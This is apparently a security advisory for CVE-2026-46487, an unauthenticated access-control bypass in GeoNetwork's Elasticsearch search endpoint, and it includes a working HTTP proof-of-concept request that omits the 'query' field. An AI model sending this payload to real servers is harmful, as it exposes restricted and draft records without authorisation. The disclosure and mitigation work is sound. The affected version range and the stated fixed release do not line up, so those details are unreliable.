high · 7.5CVE-2026-46487Jul 1, 2026

CVE-2026-46487: GeoNetwork Elasticsearch Search ACL Bypass via Missing Query Field

Shubham Kandhare
Security Engagement Manager, SecureLayer7

An unauthenticated attacker can retrieve restricted metadata records from GeoNetwork by sending a search request that omits the query field, causing the access-control filter injection to be skipped e

Packageorg.geonetwork-opensource:geonetwork
Ecosystemmaven
Affected>= 4.0.0-alpha.1, <= 4.0.6-0

The problem

GeoNetwork 4.x proxies all Elasticsearch search requests through a filter layer that injects group-based visibility rules, draft exclusions, ownership checks, and portal filters before forwarding to the index.

A logic flaw in that injection step means it only fires when the incoming JSON body contains a top-level `query` key. A body that omits `query` (for example, one containing only `size`, `_source`, or `aggs`) bypasses the check entirely. The raw request reaches Elasticsearch with no ACL constraints, exposing all indexed metadata including records limited to specific groups, draft records, and records that should be portal-scoped.

Proof of concept

A working proof-of-concept for CVE-2026-46487 in org.geonetwork-opensource:geonetwork, with the exact payload below.

http
POST /geonetwork/srv/api/search/records/_search HTTP/1.1
Host: <target>
Content-Type: application/json

{
  "size": 100,
  "_source": ["uuid", "resourceTitleObject", "groupOwner", "owner", "isPublishedToAll"],
  "sort": [{"_score": "desc"}]
}

The root cause is CWE-862 (Missing Authorization): the filter-injection code path is guarded by a condition that checks for the presence of a `query` node in the request body, so a body without that node skips the guard and forwards a completely unconstrained query to Elasticsearch.

The patch adds an unconditional ACL filter application step that runs regardless of whether a `query` field is present, ensuring the `bool` filter clauses (group visibility, draft status, ownership, portal scope) are always merged into the outgoing Elasticsearch request.

No public PoC has been published; this payload is derived directly from the advisory's stated trigger condition (omitting the `query` field) and the documented search endpoint behaviour.

The fix

Upgrade to GeoNetwork 4.4.11 or later (the first release containing the unconditional ACL filter guard). If an immediate upgrade is not possible, restrict unauthenticated access to `/srv/api/search/records/_search` and `/_msearch` at the reverse-proxy or WAF layer until the patch can be applied.

Reporter not attributed.

References: [1][2]

Related research